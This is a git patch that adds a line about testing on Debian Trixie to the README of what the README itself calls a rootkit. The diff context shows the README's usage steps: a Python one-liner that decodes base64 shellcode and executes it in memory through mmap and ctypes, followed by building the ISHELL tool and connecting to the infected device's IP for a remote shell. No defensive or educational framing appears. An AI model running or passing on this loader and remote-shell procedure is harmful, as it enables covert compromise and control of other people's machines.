From 44b308363bd548c7ae68c1768739c091c3fa934c Mon Sep 17 00:00:00 2001 From: mephistolist <49227141+mephistolist@users.noreply.github.com> Date: Wed, 9 Oct 2024 06:05:14 +0000 Subject: [PATCH] Update README.md --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 7e0906a..85b0b73 100644 --- a/README.md +++ b/README.md @@ -12,3 +12,5 @@ python3 -c 'import base64, mmap, ctypes; encoded_shellcode = "SDHJSIHp9////0iNBe ``` From there you may go into the ISHELL-v0.3 folder and type 'make linux' to build ish. Then you may run ish with the ip of the device the rootkit was ran on to connect. + +Currently tested on Debian Trixie.